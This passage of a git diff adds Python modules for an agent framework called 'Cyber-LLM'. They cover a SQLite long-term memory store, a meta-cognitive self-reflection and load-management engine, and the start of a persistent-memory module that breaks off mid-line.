session_id: str = "" + + def __post_init__(self): + if self.tags is None: + self.tags = [] + +class LongTermMemoryManager: + """Advanced persistent memory system with cross-session capabilities""" + + def __init__(self, db_path: str = "data/cognitive/long_term_memory.db"): + """Initialize long-term memory system""" + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_database() + self._memory_cache = {} + self._embeddings_model = None + + def _init_database(self): + """Initialize database schemas""" + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + CREATE TABLE IF NOT EXISTS long_term_memory ( + id TEXT PRIMARY KEY, + content TEXT NOT NULL, + memory_type TEXT NOT NULL, + timestamp TEXT NOT NULL, + importance REAL NOT NULL, + access_count INTEGER DEFAULT 0, + last_accessed TEXT NOT NULL, + embedding TEXT, + tags TEXT, + agent_id TEXT, + session_id TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP, + updated_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_associations ( + id TEXT PRIMARY KEY, + memory_id_1 TEXT, + memory_id_2 TEXT, + association_type TEXT, + strength REAL, + created_at TEXT DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (memory_id_1) REFERENCES long_term_memory(id), + FOREIGN KEY (memory_id_2) REFERENCES long_term_memory(id) + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_consolidation_log ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + consolidation_type TEXT, + memories_processed INTEGER, + patterns_discovered INTEGER, + timestamp TEXT DEFAULT CURRENT_TIMESTAMP, + details TEXT + ) + """) + + # Create indices for performance + conn.execute("CREATE INDEX IF NOT EXISTS idx_memory_type ON long_term_memory(memory_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_agent_id ON long_term_memory(agent_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_importance ON long_term_memory(importance)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_timestamp ON long_term_memory(timestamp)") + + def store_memory(self, content: str, memory_type: str, + importance: float = 0.5, agent_id: str = "", + session_id: str = "", tags: List[str] = None) -> str: + """Store a new memory with intelligent categorization""" + try: + memory_id = hashlib.sha256(f"{content}{memory_type}{datetime.now().isoformat()}".encode()).hexdigest() + + record = MemoryRecord( + id=memory_id, + content=content, + memory_type=memory_type, + timestamp=datetime.now(), + importance=importance, + access_count=0, + last_accessed=datetime.now(), + tags=tags or [], + agent_id=agent_id, + session_id=session_id + ) + + # Generate embedding for semantic search + if self._embeddings_model: + record.embedding = self._generate_embedding(content) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO long_term_memory ( + id, content, memory_type, timestamp, importance, + access_count, last_accessed, embedding, tags, agent_id, session_id + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + record.id, record.content, record.memory_type, + record.timestamp.isoformat(), record.importance, + record.access_count, record.last_accessed.isoformat(), + json.dumps(record.embedding) if record.embedding else None, + json.dumps(record.tags), record.agent_id, record.session_id + )) + + logger.info(f"Stored long-term memory: {memory_id[:8]}... ({memory_type})") + return memory_id + + except Exception as e: + logger.error(f"Error storing memory: {e}") + return "" + + def retrieve_memories(self, query: str = "", memory_type: str = "", + agent_id: str = "", limit: int = 10, + importance_threshold: float = 0.0) -> List[MemoryRecord]: + """Retrieve memories with intelligent filtering and ranking""" + try: + with sqlite3.connect(self.db_path) as conn: + conditions = [] + params = [] + + if query: + conditions.append("content LIKE ?") + params.append(f"%{query}%") + + if memory_type: + conditions.append("memory_type = ?") + params.append(memory_type) + + if agent_id: + conditions.append("agent_id = ?") + params.append(agent_id) + + if importance_threshold > 0: + conditions.append("importance >= ?") + params.append(importance_threshold) + + where_clause = " AND ".join(conditions) if conditions else "1=1" + + cursor = conn.execute(f""" + SELECT * FROM long_term_memory + WHERE {where_clause} + ORDER BY importance DESC, access_count DESC, timestamp DESC + LIMIT ? + """, params + [limit]) + + memories = [] + for row in cursor.fetchall(): + memory = MemoryRecord( + id=row[0], + content=row[1], + memory_type=row[2], + timestamp=datetime.fromisoformat(row[3]), + importance=row[4], + access_count=row[5], + last_accessed=datetime.fromisoformat(row[6]), + embedding=json.loads(row[7]) if row[7] else None, + tags=json.loads(row[8]) if row[8] else [], + agent_id=row[9] or "", + session_id=row[10] or "" + ) + memories.append(memory) + + # Update access statistics + self._update_access_stats(memory.id) + + logger.info(f"Retrieved {len(memories)} memories for query: {query[:50]}...") + return memories + + except Exception as e: + logger.error(f"Error retrieving memories: {e}") + return [] + + def consolidate_memories(self) -> Dict[str, int]: + """Advanced memory consolidation with pattern discovery""" + try: + stats = { + 'memories_processed': 0, + 'patterns_discovered': 0, + 'associations_created': 0, + 'memories_merged': 0 + } + + with sqlite3.connect(self.db_path) as conn: + # Get all memories for consolidation + cursor = conn.execute(""" + SELECT * FROM long_term_memory + ORDER BY timestamp DESC + """) + + memories = cursor.fetchall() + stats['memories_processed'] = len(memories) + + # Pattern discovery through content similarity + for i, memory1 in enumerate(memories): + for j, memory2 in enumerate(memories[i+1:], i+1): + similarity = self._calculate_semantic_similarity( + memory1[1], memory2[1] + ) + + if similarity > 0.8: # High similarity threshold + self._create_memory_association( + memory1[0], memory2[0], "semantic_similarity", similarity + ) + stats['associations_created'] += 1 + stats['patterns_discovered'] += 1 + + # Temporal pattern detection + self._detect_temporal_patterns(memories) + + # Log consolidation results + conn.execute(""" + INSERT INTO memory_consolidation_log ( + consolidation_type, memories_processed, + patterns_discovered, details + ) VALUES (?, ?, ?, ?) + """, ( + "full_consolidation", stats['memories_processed'], + stats['patterns_discovered'], json.dumps(stats) + )) + + logger.info(f"Memory consolidation complete: {stats}") + return stats + + except Exception as e: + logger.error(f"Error during memory consolidation: {e}") + return {'error': str(e)} + + def get_cross_session_context(self, agent_id: str, limit: int = 20) -> List[MemoryRecord]: + """Retrieve cross-session context for agent continuity""" + try: + with sqlite3.connect(self.db_path) as conn: + cursor = conn.execute(""" + SELECT * FROM long_term_memory + WHERE agent_id = ? + ORDER BY importance DESC, last_accessed DESC, timestamp DESC + LIMIT ? + """, (agent_id, limit)) + + memories = [] + for row in cursor.fetchall(): + memory = MemoryRecord( + id=row[0], + content=row[1], + memory_type=row[2], + timestamp=datetime.fromisoformat(row[3]), + importance=row[4], + access_count=row[5], + last_accessed=datetime.fromisoformat(row[6]), + embedding=json.loads(row[7]) if row[7] else None, + tags=json.loads(row[8]) if row[8] else [], + agent_id=row[9] or "", + session_id=row[10] or "" + ) + memories.append(memory) + + logger.info(f"Retrieved {len(memories)} cross-session memories for agent {agent_id}") + return memories + + except Exception as e: + logger.error(f"Error retrieving cross-session context: {e}") + return [] + + def _update_access_stats(self, memory_id: str): + """Update memory access statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + UPDATE long_term_memory + SET access_count = access_count + 1, + last_accessed = ?, + updated_at = CURRENT_TIMESTAMP + WHERE id = ? + """, (datetime.now().isoformat(), memory_id)) + + except Exception as e: + logger.error(f"Error updating access stats: {e}") + + def _generate_embedding(self, content: str) -> List[float]: + """Generate embeddings for semantic search (placeholder)""" + # In production, use a proper embedding model + # For now, return a simple hash-based vector + hash_val = hash(content) + return [float((hash_val >> i) & 1) for i in range(128)] + + def _calculate_semantic_similarity(self, text1: str, text2: str) -> float: + """Calculate semantic similarity between texts""" + # Simple word overlap similarity (replace with proper embeddings) + words1 = set(text1.lower().split()) + words2 = set(text2.lower().split()) + + if not words1 or not words2: + return 0.0 + + intersection = len(words1 & words2) + union = len(words1 | words2) + + return intersection / union if union > 0 else 0.0 + + def _create_memory_association(self, memory_id_1: str, memory_id_2: str, + association_type: str, strength: float): + """Create association between memories""" + try: + association_id = hashlib.sha256( + f"{memory_id_1}{memory_id_2}{association_type}".encode() + ).hexdigest() + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT OR REPLACE INTO memory_associations ( + id, memory_id_1, memory_id_2, association_type, strength + ) VALUES (?, ?, ?, ?, ?) + """, (association_id, memory_id_1, memory_id_2, association_type, strength)) + + except Exception as e: + logger.error(f"Error creating memory association: {e}") + + def _detect_temporal_patterns(self, memories: List[Tuple]): + """Detect temporal patterns in memory sequences""" + # Group memories by agent and detect sequences + agent_memories = {} + for memory in memories: + agent_id = memory[9] or "unknown" + if agent_id not in agent_memories: + agent_memories[agent_id] = [] + agent_memories[agent_id].append(memory) + + # Analyze patterns within each agent's memory timeline + for agent_id, agent_mem_list in agent_memories.items(): + # Sort by timestamp + agent_mem_list.sort(key=lambda x: x[3]) # timestamp is at index 3 + + # Detect recurring patterns or sequences + # This is a simplified pattern detection + for i in range(len(agent_mem_list) - 2): + # Look for sequences of similar operations + mem1, mem2, mem3 = agent_mem_list[i:i+3] + + # Check for similar memory types in sequence + if mem1[2] == mem2[2] == mem3[2]: # same memory_type + self._create_memory_association( + mem1[0], mem3[0], "temporal_sequence", 0.7 + ) + + def get_memory_statistics(self) -> Dict[str, Any]: + """Get comprehensive memory system statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + stats = {} + + # Basic counts + cursor = conn.execute("SELECT COUNT(*) FROM long_term_memory") + stats['total_memories'] = cursor.fetchone()[0] + + # Memory type distribution + cursor = conn.execute(""" + SELECT memory_type, COUNT(*) + FROM long_term_memory + GROUP BY memory_type + """) + stats['memory_types'] = dict(cursor.fetchall()) + + # Agent distribution + cursor = conn.execute(""" + SELECT agent_id, COUNT(*) + FROM long_term_memory + WHERE agent_id != '' + GROUP BY agent_id + """) + stats['agent_distribution'] = dict(cursor.fetchall()) + + # Importance distribution + cursor = conn.execute(""" + SELECT + CASE + WHEN importance >= 0.8 THEN 'high' + WHEN importance >= 0.5 THEN 'medium' + ELSE 'low' + END as importance_level, + COUNT(*) + FROM long_term_memory + GROUP BY importance_level + """) + stats['importance_distribution'] = dict(cursor.fetchall()) + + # Association statistics + cursor = conn.execute("SELECT COUNT(*) FROM memory_associations") + stats['total_associations'] = cursor.fetchone()[0] + + return stats + + except Exception as e: + logger.error(f"Error getting memory statistics: {e}") + return {'error': str(e)} + +# Export the main class +__all__ = ['LongTermMemoryManager', 'MemoryRecord'] diff --git a/src/cognitive/meta_cognitive.py b/src/cognitive/meta_cognitive.py new file mode 100644 index 0000000000000000000000000000000000000000..51643f973b799475e40e069351c0f50cf7551023 --- /dev/null +++ b/src/cognitive/meta_cognitive.py @@ -0,0 +1,487 @@ +""" +Meta-Cognitive Capabilities for Cyber-LLM +Self-reflection, adaptation, and cognitive load management + +Author: Muzan Sano +""" + +import asyncio +import json +import logging +import numpy as np +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple, Union +from dataclasses import dataclass, field +from enum import Enum +import torch +import torch.nn as nn +from collections import deque + +from ..utils.logging_system import CyberLLMLogger, CyberLLMError, ErrorCategory +from ..memory.persistent_memory import PersistentMemoryManager +from ..memory.strategic_planning import StrategicPlanningEngine + +class CognitiveState(Enum): + """Cognitive processing states""" + OPTIMAL = "optimal" + MODERATE_LOAD = "moderate_load" + HIGH_LOAD = "high_load" + OVERLOADED = "overloaded" + RECOVERING = "recovering" + +class AdaptationStrategy(Enum): + """Learning adaptation strategies""" + AGGRESSIVE = "aggressive" + MODERATE = "moderate" + CONSERVATIVE = "conservative" + CAUTIOUS = "cautious" + +@dataclass +class CognitiveMetrics: + """Cognitive performance metrics""" + timestamp: datetime + + # Performance metrics + task_completion_rate: float + accuracy_score: float + response_time: float + resource_utilization: float + + # Cognitive load indicators + attention_fragmentation: float # 0-1, higher = more fragmented + working_memory_usage: float # 0-1, percentage used + processing_complexity: float # 0-1, task complexity measure + + # Adaptation metrics + learning_rate: float + confidence_level: float + adaptation_success_rate: float + + # Error metrics + error_count: int + critical_errors: int + recovery_time: Optional[float] = None + +@dataclass +class SelfReflectionResult: + """Results from self-reflection analysis""" + reflection_id: str + timestamp: datetime + + # Performance assessment + strengths: List[str] + weaknesses: List[str] + improvement_areas: List[str] + + # Strategy effectiveness + effective_strategies: List[str] + ineffective_strategies: List[str] + recommended_changes: List[str] + + # Cognitive insights + cognitive_patterns: Dict[str, Any] + load_management_insights: List[str] + attention_allocation_insights: List[str] + + # Action items + immediate_adjustments: List[str] + medium_term_goals: List[str] + long_term_objectives: List[str] + +class MetaCognitiveEngine: + """Advanced meta-cognitive capabilities for self-reflection and adaptation""" + + def __init__(self, + memory_manager: PersistentMemoryManager, + strategic_planner: StrategicPlanningEngine, + logger: Optional[CyberLLMLogger] = None): + + self.memory_manager = memory_manager + self.strategic_planner = strategic_planner + self.logger = logger or CyberLLMLogger(name="meta_cognitive") + + # Cognitive state tracking + self.current_state = CognitiveState.OPTIMAL + self.state_history = deque(maxlen=1000) + self.cognitive_metrics = deque(maxlen=10000) + + # Self-reflection system + self.reflection_history = {} + self.performance_baselines = {} + self.adaptation_strategies = {} + + # Cognitive load management + self.attention_allocator = AttentionAllocator() + self.cognitive_load_monitor = CognitiveLoadMonitor() + + # Learning optimization + self.learning_rate_optimizer = LearningRateOptimizer() + self.strategy_evaluator = StrategyEvaluator() + + # Neural networks for meta-learning + self.performance_predictor = self._build_performance_predictor() + self.strategy_selector = self._build_strategy_selector() + + self.logger.info("Meta-Cognitive Engine initialized") + + async def conduct_self_reflection(self, + time_period: timedelta = timedelta(hours=1)) -> SelfReflectionResult: + """Conduct comprehensive self-reflection analysis""" + + reflection_id = f"reflection_{datetime.now().strftime('%Y%m%d_%H%M%S')}" + + try: + self.logger.info("Starting self-reflection analysis", reflection_id=reflection_id) + + # Gather performance data + end_time = datetime.now() + start_time = end_time - time_period + + performance_data = await self._gather_performance_data(start_time, end_time) + cognitive_data = await self._gather_cognitive_data(start_time, end_time) + strategy_data = await self._gather_strategy_data(start_time, end_time) + + # Analyze strengths and weaknesses + strengths, weaknesses = await self._analyze_performance_patterns(performance_data) + + # Evaluate strategy effectiveness + effective_strategies, ineffective_strategies = await self._evaluate_strategies(strategy_data) + + # Generate insights + cognitive_patterns = await self._analyze_cognitive_patterns(cognitive_data) + load_insights = await self._analyze_load_management(cognitive_data) + attention_insights = await self._analyze_attention_allocation(cognitive_data) + + # Generate recommendations + immediate_adjustments = await self._generate_immediate_adjustments( + weaknesses, ineffective_strategies, cognitive_patterns) + medium_term_goals = await self._generate_medium_term_goals( + strengths, weaknesses, cognitive_patterns) + long_term_objectives = await self._generate_long_term_objectives( + performance_data, cognitive_patterns) + + # Create reflection result + reflection_result = SelfReflectionResult( + reflection_id=reflection_id, + timestamp=datetime.now(), + strengths=strengths, + weaknesses=weaknesses, + improvement_areas=list(set(weaknesses + [adj.split(':')[0] for adj in immediate_adjustments])), + effective_strategies=effective_strategies, + ineffective_strategies=ineffective_strategies, + recommended_changes=immediate_adjustments + medium_term_goals, + cognitive_patterns=cognitive_patterns, + load_management_insights=load_insights, + attention_allocation_insights=attention_insights, + immediate_adjustments=immediate_adjustments, + medium_term_goals=medium_term_goals, + long_term_objectives=long_term_objectives + ) + + # Store reflection result + self.reflection_history[reflection_id] = reflection_result + + # Store in persistent memory + await self.memory_manager.store_reasoning_chain( + chain_id=f"self_reflection_{reflection_id}", + steps=[ + f"Analyzed performance over {time_period}", + f"Identified {len(strengths)} strengths and {len(weaknesses)} weaknesses", + f"Evaluated {len(effective_strategies)} effective strategies", + f"Generated {len(immediate_adjustments)} immediate adjustments" + ], + conclusion=f"Self-reflection completed with actionable insights", + confidence=0.85, + metadata={ + "reflection_type": "comprehensive_analysis", + "time_period": str(time_period), + "performance_score": np.mean([m.accuracy_score for m in self.cognitive_metrics if m.timestamp >= start_time]) + } + ) + + self.logger.info("Self-reflection analysis completed", + reflection_id=reflection_id, + strengths_count=len(strengths), + weaknesses_count=len(weaknesses), + recommendations_count=len(immediate_adjustments)) + + return reflection_result + + except Exception as e: + self.logger.error("Self-reflection analysis failed", error=str(e)) + raise CyberLLMError("Self-reflection failed", ErrorCategory.COGNITIVE_ERROR) + + async def optimize_learning_rate(self, + recent_performance: List[float], + task_complexity: float) -> float: + """Optimize learning rate based on recent performance and task complexity""" + + try: + # Analyze performance trends + performance_trend = self._calculate_performance_trend(recent_performance) + performance_variance = np.var(recent_performance) + + # Current learning rate + current_lr = self.learning_rate_optimizer.get_current_rate() + + # Adaptation strategy based on performance + if performance_trend > 0.1 and performance_variance < 0.05: + # Good performance, stable -> slightly increase learning rate + adaptation_factor = 1.1 + strategy = AdaptationStrategy.AGGRESSIVE + elif performance_trend > 0.05: + # Moderate improvement -> maintain or slight increase + adaptation_factor = 1.05 + strategy = AdaptationStrategy.MODERATE + elif performance_trend < -0.1 or performance_variance > 0.2: + # Poor performance or high variance -> decrease learning rate + adaptation_factor = 0.8 + strategy = AdaptationStrategy.CAUTIOUS + else: + # Stable performance -> minor adjustment based on complexity + adaptation_factor = 1.0 - (task_complexity - 0.5) * 0.1 + strategy = AdaptationStrategy.CONSERVATIVE + + # Apply complexity adjustment + complexity_factor = 1.0 - (task_complexity * 0.3) + final_factor = adaptation_factor * complexity_factor + + # Calculate new learning rate + new_lr = current_lr * final_factor + new_lr = np.clip(new_lr, 0.0001, 0.1) # Keep within reasonable bounds + + # Update learning rate optimizer + self.learning_rate_optimizer.update_rate(new_lr, strategy) + + self.logger.info("Learning rate optimized", + old_rate=current_lr, + new_rate=new_lr, + strategy=strategy.value, + performance_trend=performance_trend) + + return new_lr + + except Exception as e: + self.logger.error("Learning rate optimization failed", error=str(e)) + return self.learning_rate_optimizer.get_current_rate() + + async def manage_cognitive_load(self, + current_tasks: List[Dict[str, Any]], + available_resources: Dict[str, float]) -> Dict[str, Any]: + """Manage cognitive load and optimize task allocation""" + + try: + # Calculate current cognitive load + current_load = await self._calculate_cognitive_load(current_tasks) + + # Determine cognitive state + new_state = self._determine_cognitive_state(current_load, available_resources) + + # Update state if changed + if new_state != self.current_state: + self.logger.info("Cognitive state changed", + old_state=self.current_state.value, + new_state=new_state.value) + self.current_state = new_state + self.state_history.append((datetime.now(), new_state)) + + # Generate load management strategy + management_strategy = await self._generate_load_management_strategy( + current_load, new_state, current_tasks, available_resources) + + # Apply attention allocation optimization + attention_allocation = await self.attention_allocator.optimize_allocation( + current_tasks, available_resources, new_state) + + # Generate recommendations + recommendations = await self._generate_load_management_recommendations( + current_load, new_state, management_strategy) + + result = { + "cognitive_state": new_state.value, + "cognitive_load": current_load, + "management_strategy": management_strategy, + "attention_allocation": attention_allocation, + "recommendations": recommendations, + "resource_adjustments": await self._calculate_resource_adjustments( + new_state, available_resources) + } + + self.logger.info("Cognitive load management completed", + state=new_state.value, + load=current_load, + recommendations_count=len(recommendations)) + + return result + + except Exception as e: + self.logger.error("Cognitive load management failed", error=str(e)) + return {"error": str(e)} + + def _build_performance_predictor(self) -> nn.Module: + """Build neural network for performance prediction""" + + class PerformancePredictor(nn.Module): + def __init__(self): + super().__init__() + self.fc1 = nn.Linear(20, 64) # Input: various metrics + self.fc2 = nn.Linear(64, 32) + self.fc3 = nn.Linear(32, 16) + self.fc4 = nn.Linear(16, 1) # Output: predicted performance + self.dropout = nn.Dropout(0.2) + + def forward(self, x): + x = torch.relu(self.fc1(x)) + x = self.dropout(x) + x = torch.relu(self.fc2(x)) + x = self.dropout(x) + x = torch.relu(self.fc3(x)) + x = torch.sigmoid(self.fc4(x)) + return x + + return PerformancePredictor() + + def _build_strategy_selector(self) -> nn.Module: + """Build neural network for strategy selection""" + + class StrategySelector(nn.Module): + def __init__(self): + super().__init__() + self.fc1 = nn.Linear(15, 48) # Input: context features + self.fc2 = nn.Linear(48, 24) + self.fc3 = nn.Linear(24, 8) # Output: strategy probabilities + self.dropout = nn.Dropout(0.15) + + def forward(self, x): + x = torch.relu(self.fc1(x)) + x = self.dropout(x) + x = torch.relu(self.fc2(x)) + x = torch.softmax(self.fc3(x), dim=-1) + return x + + return StrategySelector() + +class AttentionAllocator: + """Manages dynamic attention allocation across tasks""" + + def __init__(self): + self.attention_weights = {} + self.priority_scores = {} + self.allocation_history = deque(maxlen=1000) + + async def optimize_allocation(self, + tasks: List[Dict[str, Any]], + resources: Dict[str, float], + cognitive_state: CognitiveState) -> Dict[str, float]: + """Optimize attention allocation across tasks""" + + # Calculate base priority scores + for task in tasks: + task_id = task.get('id', str(hash(str(task)))) + priority = task.get('priority', 0.5) + complexity = task.get('complexity', 0.5) + deadline_pressure = task.get('deadline_pressure', 0.0) + + # Adjust priority based on cognitive state + state_multiplier = { + CognitiveState.OPTIMAL: 1.0, + CognitiveState.MODERATE_LOAD: 0.9, + CognitiveState.HIGH_LOAD: 0.7, + CognitiveState.OVERLOADED: 0.5, + CognitiveState.RECOVERING: 0.6 + }.get(cognitive_state, 1.0) + + adjusted_priority = (priority * 0.4 + + deadline_pressure * 0.4 + + (1.0 - complexity) * 0.2) * state_multiplier + + self.priority_scores[task_id] = adjusted_priority + + # Normalize allocation + total_priority = sum(self.priority_scores.values()) + if total_priority > 0: + allocation = {task_id: score / total_priority + for task_id, score in self.priority_scores.items()} + else: + # Equal allocation if no priorities + equal_weight = 1.0 / len(tasks) if tasks else 0.0 + allocation = {task.get('id', str(i)): equal_weight + for i, task in enumerate(tasks)} + + # Store allocation history + self.allocation_history.append((datetime.now(), allocation)) + + return allocation + +class CognitiveLoadMonitor: + """Monitors and analyzes cognitive load patterns""" + + def __init__(self): + self.load_history = deque(maxlen=10000) + self.load_patterns = {} + + def calculate_load(self, + active_tasks: int, + task_complexity: float, + resource_usage: float, + error_rate: float) -> float: + """Calculate current cognitive load""" + + # Base load from task count (logarithmic scaling) + task_load = min(np.log(active_tasks + 1) / np.log(10), 1.0) + + # Complexity contribution + complexity_load = task_complexity * 0.3 + + # Resource pressure + resource_load = resource_usage * 0.25 + + # Error pressure (exponential) + error_load = min(error_rate ** 0.5, 1.0) * 0.2 + + total_load = task_load + complexity_load + resource_load + error_load + + # Store in history + self.load_history.append((datetime.now(), total_load)) + + return min(total_load, 1.0) + +class LearningRateOptimizer: + """Optimizes learning rates based on performance feedback""" + + def __init__(self, initial_rate: float = 0.001): + self.current_rate = initial_rate + self.rate_history = deque(maxlen=1000) + self.performance_history = deque(maxlen=1000) + self.strategy_effectiveness = {} + + def get_current_rate(self) -> float: + return self.current_rate + + def update_rate(self, new_rate: float, strategy: AdaptationStrategy): + self.rate_history.append((datetime.now(), self.current_rate, new_rate, strategy)) + self.current_rate = new_rate + +class StrategyEvaluator: + """Evaluates effectiveness of different strategies""" + + def __init__(self): + self.strategy_outcomes = {} + self.strategy_scores = {} + + def record_strategy_outcome(self, strategy: str, outcome_score: float): + if strategy not in self.strategy_outcomes: + self.strategy_outcomes[strategy] = deque(maxlen=100) + + self.strategy_outcomes[strategy].append((datetime.now(), outcome_score)) + + # Update average score + scores = [score for _, score in self.strategy_outcomes[strategy]] + self.strategy_scores[strategy] = np.mean(scores) + +# Factory function +def create_meta_cognitive_engine(memory_manager: PersistentMemoryManager, + strategic_planner: StrategicPlanningEngine, + **kwargs) -> MetaCognitiveEngine: + """Create meta-cognitive engine""" + return MetaCognitiveEngine(memory_manager, strategic_planner, **kwargs) diff --git a/src/cognitive/persistent_memory.py b/src/cognitive/persistent_memory.py new file mode 100644 index 0000000000000000000000000000000000000000..8220014153138e26398372d668dccdb3c379996b --- /dev/null +++ b/src/cognitive/persistent_memory.py @@ -0,0 +1,1165 @@ +""" +Persistent Memory Architecture for Advanced Cognitive Agents +Long-term memory systems with cross-session persistence and strategic thinking +""" + +import sqlite3 +import json +import pickle +import numpy as np +from typing import Dict, List, Optional, Any, Tuple, Union, Set +from dataclasses import dataclass, asdict +from datetime import datetime, timedelta +import logging +from abc import ABC, abstractmethod +from collections import defaultdict, deque +import asyncio +import threading +import time +from enum import Enum +import hashlib +import uuid +from pathlib import Path + +class MemoryType(Enum): + EPISODIC = "episodic" # Events and experiences + SEMANTIC = "semantic" # Facts and knowledge + PROCEDURAL = "procedural" # Skills and procedures + WORKING = "working" # Temporary active memory + STRATEGIC = "strategic" # Long-term goals and plans + +class ReasoningType(Enum): + DEDUCTIVE = "deductive" # General to specific + INDUCTIVE = "inductive" # Specific to general + ABDUCTIVE = "abductive" # Best explanation + ANALOGICAL = "analogical" # Pattern matching + CAUSAL = "causal" # Cause and effect + STRATEGIC = "strategic" # Goal-oriented + COUNTERFACTUAL = "counterfactual" # What-if scenarios + METACOGNITIVE = "metacognitive" # Thinking about thinking + +@dataclass +class MemoryItem: + """Base class for memory items""" + memory_id: str + memory_type: MemoryType + content: Dict[str, Any] + timestamp: str + importance: float # 0.0 to 1.0 + access_count: int + last_accessed: str + tags: List[str] + metadata: Dict[str, Any] + expires_at: Optional[str] = None + +@dataclass +class EpisodicMemory(MemoryItem): + """Specific events and experiences""" + event_type: str + context: Dict[str, Any] + outcome: Dict[str, Any] + learned_patterns: List[str] + emotional_valence: float # -1.0 (negative) to 1.0 (positive) + + def __post_init__(self): + self.memory_type = MemoryType.EPISODIC + +@dataclass +class SemanticMemory(MemoryItem): + """Facts and general knowledge""" + concept: str + properties: Dict[str, Any] + relationships: List[Dict[str, Any]] + confidence: float + evidence: List[str] + + def __post_init__(self): + self.memory_type = MemoryType.SEMANTIC + +@dataclass +class ProceduralMemory(MemoryItem): + """Skills and procedures""" + skill_name: str + steps: List[Dict[str, Any]] + conditions: Dict[str, Any] + success_rate: float + optimization_history: List[Dict[str, Any]] + + def __post_init__(self): + self.memory_type = MemoryType.PROCEDURAL + +@dataclass +class WorkingMemory(MemoryItem): + """Temporary active memory""" + current_goal: str + active_context: Dict[str, Any] + attention_focus: List[str] + processing_state: Dict[str, Any] + + def __post_init__(self): + self.memory_type = MemoryType.WORKING + +@dataclass +class StrategicMemory(MemoryItem): + """Long-term goals and strategic plans""" + goal: str + plan_steps: List[Dict[str, Any]] + progress: float + deadline: Optional[str] + priority: int + dependencies: List[str] + success_criteria: Dict[str, Any] + + def __post_init__(self): + self.memory_type = MemoryType.STRATEGIC + +@dataclass +class ReasoningChain: + """Represents a chain of reasoning""" + chain_id: str + reasoning_type: ReasoningType + premise: Dict[str, Any] + steps: List[Dict[str, Any]] + conclusion: Dict[str, Any] + confidence: float + evidence: List[str] + timestamp: str + agent_id: str + context: Dict[str, Any] + +class MemoryConsolidator: + """Consolidates and optimizes memory over time""" + + def __init__(self, database_path: str): + self.database_path = database_path + self.logger = logging.getLogger(__name__) + self.consolidation_rules = self._init_consolidation_rules() + + def _init_consolidation_rules(self) -> Dict[str, Any]: + """Initialize memory consolidation rules""" + return { + 'episodic_to_semantic': { + 'min_occurrences': 3, + 'similarity_threshold': 0.8, + 'time_window_days': 30 + }, + 'importance_decay': { + 'decay_rate': 0.95, + 'min_importance': 0.1, + 'access_boost': 1.1 + }, + 'working_memory_cleanup': { + 'max_age_hours': 24, + 'max_items': 100, + 'importance_threshold': 0.3 + }, + 'strategic_plan_updates': { + 'progress_review_days': 7, + 'priority_adjustment': True, + 'dependency_check': True + } + } + + async def consolidate_memories(self, agent_id: str) -> Dict[str, Any]: + """Perform memory consolidation for an agent""" + consolidation_results = { + 'episodic_consolidation': 0, + 'semantic_updates': 0, + 'procedural_optimizations': 0, + 'working_memory_cleanup': 0, + 'strategic_updates': 0, + 'total_processing_time': 0 + } + + start_time = time.time() + + try: + # Episodic to semantic consolidation + consolidation_results['episodic_consolidation'] = await self._consolidate_episodic_to_semantic(agent_id) + + # Update semantic relationships + consolidation_results['semantic_updates'] = await self._update_semantic_relationships(agent_id) + + # Optimize procedural memories + consolidation_results['procedural_optimizations'] = await self._optimize_procedural_memories(agent_id) + + # Clean working memory + consolidation_results['working_memory_cleanup'] = await self._cleanup_working_memory(agent_id) + + # Update strategic plans + consolidation_results['strategic_updates'] = await self._update_strategic_plans(agent_id) + + consolidation_results['total_processing_time'] = time.time() - start_time + + self.logger.info(f"Memory consolidation completed for agent {agent_id}: {consolidation_results}") + + except Exception as e: + self.logger.error(f"Error during memory consolidation for agent {agent_id}: {e}") + + return consolidation_results + + async def _consolidate_episodic_to_semantic(self, agent_id: str) -> int: + """Convert repeated episodic memories to semantic knowledge""" + consolidated_count = 0 + + with sqlite3.connect(self.database_path) as conn: + # Find similar episodic memories + cursor = conn.execute(""" + SELECT memory_id, content, timestamp, importance, access_count + FROM memory_items + WHERE agent_id = ? AND memory_type = 'episodic' + ORDER BY timestamp DESC LIMIT 1000 + """, (agent_id,)) + + episodic_memories = cursor.fetchall() + + # Group similar memories + memory_groups = self._group_similar_memories(episodic_memories) + + for group in memory_groups: + if len(group) >= self.consolidation_rules['episodic_to_semantic']['min_occurrences']: + # Create semantic memory from pattern + semantic_memory = self._create_semantic_from_episodic_group(group, agent_id) + + if semantic_memory: + # Insert semantic memory + conn.execute(""" + INSERT INTO memory_items + (memory_id, agent_id, memory_type, content, timestamp, importance, + access_count, last_accessed, tags, metadata) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + semantic_memory.memory_id, + agent_id, + semantic_memory.memory_type.value, + json.dumps(asdict(semantic_memory)), + semantic_memory.timestamp, + semantic_memory.importance, + semantic_memory.access_count, + semantic_memory.last_accessed, + json.dumps(semantic_memory.tags), + json.dumps(semantic_memory.metadata) + )) + + consolidated_count += 1 + + return consolidated_count + + def _group_similar_memories(self, memories: List[Tuple]) -> List[List[Dict]]: + """Group similar episodic memories together""" + memory_groups = [] + processed_memories = set() + + for i, memory in enumerate(memories): + if i in processed_memories: + continue + + current_group = [memory] + memory_content = json.loads(memory[1]) + + for j, other_memory in enumerate(memories[i+1:], i+1): + if j in processed_memories: + continue + + other_content = json.loads(other_memory[1]) + similarity = self._calculate_memory_similarity(memory_content, other_content) + + if similarity >= self.consolidation_rules['episodic_to_semantic']['similarity_threshold']: + current_group.append(other_memory) + processed_memories.add(j) + + if len(current_group) > 